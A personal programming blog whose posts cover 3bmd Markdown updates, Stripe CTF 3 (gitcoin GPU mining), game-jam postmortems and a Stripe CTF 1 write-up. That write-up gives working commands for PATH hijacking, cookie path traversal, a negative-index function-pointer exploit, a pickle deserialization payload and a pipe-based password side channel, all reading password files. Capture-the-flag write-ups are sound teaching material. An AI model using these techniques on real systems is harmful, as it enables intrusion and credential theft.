Blogging again
Sat, 28 Jun 2014 00:00:00 CDT

Trying to get started blogging again, so I finally uploaded some old posts that had been waiting on me to tweak the colorization a bit, along with some info about recent 3bmd changes.

3bmd updates

3bmd is a Markdown processor implemented in Common Lisp, with various extensions.

Thanks to Vsevolod Dyomkin, it now has an extension to support some of the PHP Markdown Extra table format, so

| Left  | Center Aligned  | Right |
| :------------ |:---------------:| -----:|
| *marked up*      | some wordy text | 123 |
| plain | **centered** | 4 |

renders as

Left         Center Aligned     Right
marked up    some wordy text      123
plain        centered               4

Unlike the original PHP Markdown Extra tables, the leading and trailing | are required on each row.

Thanks to Gábor Melis, 3bmd can also output markdown, for example after making modifications to the parsed document.

Unfortunately the internal parse tree is still pretty ugly and not an officially supported API yet, so expect it to change at some point.

Stripe CTF 3
Thu, 20 Feb 2014 00:00:00 CST

Stripe had their third "Capture the Flag" at the end of January (more info here and here). Didn't do as well on this one as on the first one, but at least managed to get second on the 'gitcoin' level.

A combination of factors kept me from finishing:

  • Sleep deficit from the microcorruption.com CTF the week before.
  • Trying to use CL for all the problems and trying to use unfamiliar/unfinished libraries.
  • Not liking the format.
    While the problems were interesting, the presentation as "trying to build something useful/important" (rather than "trying to find and exploit flaws", as in CTF1 or microcorruption) made it feel odd to hack together the ugliest thing that could possibly work, or to focus exclusively on speed at the expense of generality and maintainability.
  • The biggest problem though, was just focusing too much on gitcoin mining :)
Level 0

Level 0 was effectively just a simple (buggy) spell checker: read whitespace-delimited character sequences, downcase them, and look them up in a dictionary. Finally, print each character sequence, surrounding it in <> if it wasn't found in the dictionary, and preserving the whitespace.
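The logic above fits in a few lines. A minimal Python sketch (the contest solutions were in CL; the names here are made up):

```python
import re

def spell_check(text: str, dictionary: set) -> str:
    """Echo the input, wrapping any word not in the dictionary in <>.
    Whitespace between words survives because re.sub only touches \\S+ runs."""
    def mark(match):
        word = match.group(0)
        return word if word.lower() in dictionary else "<%s>" % word
    return re.sub(r"\S+", mark, text)

print(spell_check("Speling is  hard", {"is", "hard"}))  # → <Speling> is  hard
```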

Just reading the dictionary into a hash table was good enough to pass and get to #201 on the leaderboard. Unfortunately someone mentioned the fast solution (Bloom filters) in IRC, and from what I understand the fastest solutions were limited mostly by the timing wrapper, so I wasn't as motivated to try any of the ideas I had for improving my solution (like memory mapping the dictionary file and doing a binary search directly in that, or indexing it in advance and only loading pieces).
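For reference, the Bloom filter approach people mentioned looks roughly like this (a sketch, not anyone's actual entry; the sizes are arbitrary):

```python
import hashlib

class BloomFilter:
    """Tiny Bloom filter: k hash positions in an m-bit array.
    False positives are possible; false negatives are not."""
    def __init__(self, m=1 << 20, k=4):
        self.m, self.k, self.bits = m, k, bytearray(m // 8)

    def _positions(self, word):
        # Derive k positions by salting one hash function with an index.
        for i in range(self.k):
            h = hashlib.sha1(b"%d:%s" % (i, word.encode())).digest()
            yield int.from_bytes(h[:8], "big") % self.m

    def add(self, word):
        for p in self._positions(word):
            self.bits[p // 8] |= 1 << (p % 8)

    def __contains__(self, word):
        return all(self.bits[p // 8] & (1 << (p % 8)) for p in self._positions(word))

bf = BloomFilter()
for word in ("apple", "banana"):
    bf.add(word)
print("apple" in bf, "zzyzx" in bf)  # → True False
```

The whole dictionary collapses into one cache-friendly bit array, which is why it beats a hash table here.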

Level 1

Level 1 is where I spent most of my time. The goal was to write a miner for a git-based cryptocoin called "gitcoin". To mine a gitcoin, you have to successfully push a commit with a hash less than a specified "difficulty" value. To pass the level, you have to get a commit before a set of bots push a commit, which happens every 90 seconds or so. After that, there is an option to play against other players.

The provided example is a shell script that just calls git commands to check hashes. Considering that at the initial difficulty the odds of getting a valid hash are about 50% after 11 million tries, starting a new process for every try is probably a bad idea.
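For a sense of where that number comes from: if the target is six leading hex zeros (my assumption about the initial difficulty), each try succeeds with probability 16⁻⁶, and the median number of tries is ln 2 / p:

```python
import math

p = 16 ** -6                    # chance one hash starts with six hex zeros (assumed difficulty)
median_tries = math.log(2) / p  # n such that (1 - p)**n ≈ 0.5
print(median_tries)             # ≈ 11.6 million, matching "about 50% after 11 million tries"
```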

The obvious first optimization is just to move the hashing loop into a single process. That takes a bit of work, since you need to replicate the way git hashes commits correctly, then make sure you can pass the data to git (or some git wrapper library) so it gets the same hash when it creates the actual commit.
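Replicating the hash is short once you know that git hashes an object as SHA-1 over a "<type> <length>\0" header followed by the body:

```python
import hashlib

def git_object_hash(obj_type: str, body: bytes) -> str:
    """SHA-1 of '<type> <len>\\0' + body, the same id `git hash-object` computes."""
    header = b"%s %d\x00" % (obj_type.encode(), len(body))
    return hashlib.sha1(header + body).hexdigest()

# The well-known id of an empty blob:
print(git_object_hash("blob", b""))  # → e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
```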

Originally, I was calling git commit-tree and trying to get the GIT_AUTHOR_* and GIT_COMMITTER_* environment variables set properly so git would create the same commit I had hashed. That worked, but I eventually switched to the easier method of just doing git hash-object -wt commit.

I think with just doing hashes in CL (using ironclad for SHA1), I was at around 150k hash/sec, enough to beat the bots to finish the level, but not enough for the PvP bonus round.

After the basic hashing and git operations are working, the next step is to take advantage of the fact that SHA1 hashes in blocks and each commit starts with the same header. We can hash just the header, then save the state of the hash at that point and reuse it for each attempt, which speeds up the hashing by 3-4x. That and some other optimizations eventually got the pure-CL miner to about 650-700k hash/sec, at which point it was time to break out the OpenCL.
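In Python terms, hashlib's copy() gives exactly this save-and-resume behavior (a sketch; the real miner used ironclad in CL, and the commit body here is an invented example):

```python
import hashlib

prefix = b"tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\n\nmining nonce "  # example commit body
NONCE_WIDTH = 8                      # fixed-width nonce keeps the total length constant

base = hashlib.sha1()
base.update(b"commit %d\x00" % (len(prefix) + NONCE_WIDTH))
base.update(prefix)                  # the shared header is hashed exactly once

def digest_for(nonce: int) -> str:
    h = base.copy()                  # resume from the saved state instead of rehashing the prefix
    h.update(b"%08x" % nonce)
    return h.hexdigest()

# Same result as rehashing the whole commit from scratch:
full = hashlib.sha1(b"commit %d\x00" % (len(prefix) + NONCE_WIDTH) + prefix + b"00000000")
assert digest_for(0) == full.hexdigest()
```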

I had written part of a bitcoin miner as a test for my CL OpenCL library, so I could reuse some of that. I just needed to replace the double SHA256 kernel with a single round of SHA1, and connect it to git instead of a bitcoin client.

Due to lack of sleep and not remembering how the old code worked, that probably took longer than it should have. I made lots of simple mistakes like miscounting the number of characters to put in the commit message to get an even number of SHA1 blocks, or miscounting the number of bits in the message to put in the SHA1 header.

Once that worked though, it was hashing at 950MHash/sec on a GTX 780, quite a bit faster than the CPU miners (fast C miners were up to ~5-10MH/s per core, some running on a few machines). Eventually the other GPU miner woke up, and made it obvious that I needed to work on my git code, since I was losing despite having about 5x the hash rate.

I was originally running single threaded, so I would stop hashing while waiting for git operations to complete, which took from a second or two for a pull up to 5 or 6 seconds for a successful push. Switching to multiple threads allowed hashing to continue while checking for new commits on the server, keeping the effective hash rate closer to peak. It also allowed starting work on the next coin while pushing, which is a pretty strong advantage when the difficulty is low enough (as it was at that point) to find multiple coins before a push finishes.
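The shape of that change is simple: hash on a worker thread so git's network round-trips no longer stall it. A toy sketch (not the actual miner):

```python
import threading, time

class Miner(threading.Thread):
    def __init__(self):
        super().__init__()
        self.stop = threading.Event()
        self.hashes = 0

    def run(self):
        while not self.stop.is_set():
            self.hashes += 1         # stand-in for hashing one candidate commit

m = Miner()
m.start()
time.sleep(0.1)                      # main thread blocks here, as it would on `git push`/`git pull`
m.stop.set()
m.join()
print(m.hashes > 0)                  # → True: mining kept going during the "push"
```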

It took a few tries to get the threading working right though. I originally over-thought things and divided up the work poorly, leading to some races.

For a while I stopped mining and later was only mining for one 15-minute round per hour, due to not liking the way the scoring was working out with a wide range of hash rates. The scoring was a combination of some points per round for everyone that got at least 1 coin, and ELO ranking between the people that got coins. The problem with that is that people who manage to get 1 or 2 coins get penalized in the ELO part, possibly lowering their overall score, while people with lower hash rate that didn't get any coins stay at the same score.

The organizers increased the per-round bonus partway through to help avoid the problems with ELO only affecting people fast enough to get coins, which seems to have helped. Unfortunately I didn't think through the implications of the increased bonus, so left my miner running only 1 round in 4 overnight and missed out on a bunch of points.

Eventually a few other people finished GPU miners and some people with access to clusters (or EC2 instances) were running a few hundred MH/sec on CPUs, so I switched my miner to use binary nonces in the commit message rather than converting them to ASCII in the OpenCL kernel. That improved the hash rate to over 1GH/sec, and I added in the AMD A8-5600K APU on a different machine for another 160MH/sec, until it locked up the machine.

From there it was just a question of people looking for more GPUs or more machines, and waiting for the final score. I tried adding an HD 6870, but unfortunately the machine with a free PCI-E slot also had SATA connectors in the way, so my final hash rate was only 1.2GH/s. One of the people with a cluster was around 1.1GH/s for a while but ran into heat problems, and the final winner was running 4.2GH/s at the end.

Level 2

Level 2 is where I started running into problems with my choice of language and libraries. The task for the level was to write a proxy for some web services to filter out a DDoS attack.

The first problem I ran into is that one of the libraries I wanted to use built a shared library, but the paths changed between the build and test environments, so it couldn't find the library. They fixed the paths quickly once I identified the problem, but it took a while to figure out what was happening.

After that, I ran into problems getting the various libraries I tried to use working together, and one of them wasn't as finished as I'd thought it was. In the end, I gave up and just modified the example node.js script.

Rejecting requests from IPs that had more than 4 requests in the last 200 ms or that had been rejected a few times already, unless the server was idle, was enough to pass but didn't score very well.
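That filter is essentially a sliding-window rate limiter. A sketch of the same rules in Python (parameters taken from the description above; the names and the strike count are my own):

```python
from collections import defaultdict, deque

WINDOW = 0.2      # seconds (200 ms)
LIMIT = 4         # max requests per IP inside the window
STRIKES = 3       # rejections before an IP is banned outright (assumed value)

recent = defaultdict(deque)    # ip -> timestamps of requests inside the window
rejections = defaultdict(int)

def allow(ip, now, server_idle=False):
    q = recent[ip]
    while q and now - q[0] > WINDOW:
        q.popleft()                # drop requests older than the window
    q.append(now)
    if server_idle:
        return True                # let anything through when there is spare capacity
    if rejections[ip] >= STRIKES or len(q) > LIMIT:
        rejections[ip] += 1
        return False
    return True

print(allow("1.2.3.4", now=0.0))   # → True: first request from this IP
```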

Level 3

The task for level 3 was a "code search" web service, which would index a set of files on demand, then respond to queries with a set of files containing the requested word.
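A bare-bones version of such an index (a sketch, nothing like the scoring-competitive entries):

```python
import os, re, tempfile
from collections import defaultdict

def build_index(root):
    """Map each word to the set of files under `root` that contain it."""
    index = defaultdict(set)
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, errors="ignore") as f:
                for word in re.findall(r"\w+", f.read()):
                    index[word].add(path)
    return index

# Tiny demo corpus:
root = tempfile.mkdtemp()
for name, text in [("a.txt", "static void main"), ("b.txt", "void pointer")]:
    with open(os.path.join(root, name), "w") as f:
        f.write(text)

index = build_index(root)
print(sorted(os.path.basename(p) for p in index["void"]))   # → ['a.txt', 'b.txt']
```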

Level 3 is where I gave up, after again running into problems with my code not running on the test server and not feeling like trying to debug it.

Stripe CTF
Mon, 12 Mar 2012 00:00:00 CDT

Stripe recently presented a set of challenges to "capture the flag" by finding and exploiting security vulnerabilities in a series of setuid binaries and web services. Now that the CTF is officially over, here is a summary of how I captured the flag:

Level 1

Level 1 is pretty easy, a setuid binary calls another program (date) without specifying a path, so we just need to create our own date program (or shell script), make it executable, then run the provided binary with our date first on the PATH.

$ echo /bin/cat /home/level02/.password > date
$ chmod +x date
$ PATH=. /levels/level01
Level 2

Level 2 gives us a PHP script that uses the contents of a cookie to construct a filename, then sends the contents of the file back to the user. We just need to send a relative path to the password file as the value of that cookie.

$ curl -u level02 --digest \
       --cookie user_details="../../home/level03/.password" \
Level 3

Level 3 gets a bit harder. It gives another SUID binary, with a disabled function to call an arbitrary program. Unfortunately it neglects to check for negative numbers when validating input, so we can fall off the front of its function pointer table instead of going past the end. With a bit of poking around in gdb and careful choice of index, we can hit the other argument passed to the program, and store a pointer to the run function there, at which point we are back to calling another program without specifying a path, as in level 01.

$ echo 00000000: 5b870408 | xxd -r > run
$ echo /bin/cat /home/level04/.password > `cat run`
$ chmod +x `cat run`
$ PATH=. /levels/level03 -28 `cat run`
Level 4

Level 4 is another setuid binary, this time with a pretty obvious buffer overflow.

char buf[1024];
strcpy(buf, str);

A quick web search turns up a nice review of why buffer overflows are bad, including a program to automate generating a string to pass to the program in order to exploit the overflow.

Unfortunately, the CTF binaries are 32-bit, and the system doesn't seem to be set up to compile 32-bit binaries, so the exploit program can't guess the proper stack address... back to gdb to get an address and hard-code it, at which point we run into another problem: "Address Space Layout Randomization."

Attempting to disable ASLR using setarch didn't seem to help, so back to the web to find a more recent example of why buffer overflows are bad, even with ASLR. The ret2eax strategy from that paper combined with the previous code lets us use the buffer overflow to run a shell as level05, at which point we can just read the password directly.

Level 5

Level 5 gives us a Python web service to exploit. Looking around in the source leads to a suspicious regex: '^type: (.*?); data: (.*?); job: (.*?)$'. A quick test with ; job: in the data passed to the service verifies it does in fact parse it incorrectly, so we can pass arbitrary data to the job field.
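The flaw is easy to reproduce: the lazy groups resynchronize on the first "; job: " they see, so a "; job: " smuggled into the data field ends up in the job group:

```python
import re

pat = re.compile(r"^type: (.*?); data: (.*?); job: (.*?)$")

honest = pat.match("type: t; data: x; job: real")
print(honest.groups())    # → ('t', 'x', 'real')

# User-controlled data of "x; job: INJECTED" shifts where the job group starts:
evil = pat.match("type: t; data: x; job: INJECTED; job: real")
print(evil.group(3))      # → 'INJECTED; job: real'
```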

Tracing through the code more carefully, the job value is a class instance serialized/deserialized using pickle, which apparently should not be used with untrusted data. If we can make the deserialization code execute arbitrary commands, we just need to have it copy the password somewhere we can read it:

$ chmod o+w .
$ curl localhost:9020 -d "; job: cos
(S'cp /home/level06/.password `pwd`/ ; chmod 777 `pwd`/.password'
$ cat .password
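The reason pickle is dangerous here: on load it will call whatever callable a class's __reduce__ hands it. A harmless demonstration (the real exploit above uses os.system the same way):

```python
import pickle

class Evil:
    def __reduce__(self):
        # On unpickling, pickle calls eval("6 * 7"); an attacker would substitute os.system.
        return (eval, ("6 * 7",))

payload = pickle.dumps(Evil())
print(pickle.loads(payload))  # → 42: code ran during deserialization
```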
Level 6

Level 6 goes back to another setuid binary, this time without any obvious way to inject our own code into it to take control. Luckily it makes the mistake of doing something as soon as it finds a mismatch between the guess and the real password, so if we can figure out a way to detect that, we can try 1 character at a time and see which one it doesn't complain about.

Since it also makes the mistake of printing something every time it checks a character, we can arrange to kill it after it makes a certain number of checks by sending the output to a pipe, then closing the other end of the pipe.

$ mkfifo foo
$ head -c 34 foo & sleep 0.1 ; /levels/level06 /home/the-flag/.password aa 2> foo

The above lets level06 print 34 characters ("Welcome to the password checker!", a newline, and one "."), then closes the reader on the pipe, killing level06 with SIGPIPE. If the first character was wrong, it prints the "Ha ha, your password is incorrect!" message before being killed on the "." printed for the second character.

Adding in a quick loop lets us test a range of characters reasonably quickly:

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c34 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password "$a"a 2> foo
> sleep 0.1
> done

then just scroll up to see which character didn't give an error ("t"), add that to the beginning of the guess, and repeat to find the next character:

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c35 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password t"$a"a 2> foo
> sleep 0.1
> done

and so on until we get to 5 for character 24, and no match for character 25, at which point we have the whole password theflagl0eFTtT5oi0nOTxO5.

LGDC 2010/Summer / ILGE 2010 entry postmortem
Thu, 08 Jul 2010 00:00:00 CDT

Ran out of energy before getting much more done than the last progress report, so the actual '7-day game' part didn't go too well.

Final results after 7 days (+ a few minutes extra to make it use more than just 2 sprites), move with arrow keys/wasd/hjkl:

What went wrong?

  • Working on non-game stuff:

    I spent a few days of the scheduled 7 working on slime/parenscript stuff, which, while probably more useful long-term, didn't really do much towards getting a game done in 7 days.

    Another chunk of time was eaten by working on my blog software. I probably would have been better off just using some hosted blog service somewhere, and only worrying about maintaining my own software for things that need it (mostly presenting code nicely, and even that might have been better handled at the editor level).

  • R&D instead of getting work done:

    The next big chunk of wasted time was spent on messing with some ideas for generating infinite ground tiles, which probably wouldn't have matched the pixel art sprites I was using even if it had worked.

  • Not knowing JS well enough:

    In particular, I still haven't figured out a good way to handle OO stuff, and most of what I could find on the subject only agreed to the extent of disliking the built-in new Foo() idiom.

  • Scope:

    While I hadn't really planned in enough detail to say that the scope was too large, a more focused plan might have helped avoid getting sidetracked onto the random terrain texture generation stuff.

  • Deployment:

    One small downside of working on browser code from SLIME is that it doesn't lead quite as naturally to having a set of files ready to put on a website. I'll probably want some combination of telling ASDF to compile the parenscript files to .js, and writing out the .js files when compiling a file from SLIME.

What went right?

  • SLIME + Parenscript:

    Being able to use SLIME while working on code running in the browser is much nicer than having to constantly reload the browser(s) after every change. It takes fewer keystrokes to see the results of a change, and maintaining state makes it much easier to test things incrementally.

  • Free art:

    While I like the idea of procedural content, a short project like this doesn't really have time to spend on developing experimental tools. Having art available with a nice license makes it much easier to get started quickly, and seeing little people wandering around is much more motivating than little boxes or other "programmer art" would be.

  • <canvas>:

    Aside from some minor annoyances like not being able to portably stretch the sprites without smoothing, the HTML canvas seems reasonably easy to use, and seemed to perform fairly well.

LGDC day 6
Thu, 01 Jul 2010 00:00:00 CDT

Now that I have somewhere to post it, here is a status report on what I've been working on for ILGE 2010.

What I have so far looks like this:

I keep getting distracted by side projects like hooking slime up to the browser by way of parenscript, so probably won't actually have a game within the originally scheduled 7 days.

I'll probably do a postmortem after that, and then decide whether to extend the project further for ILGE, or do something else for it.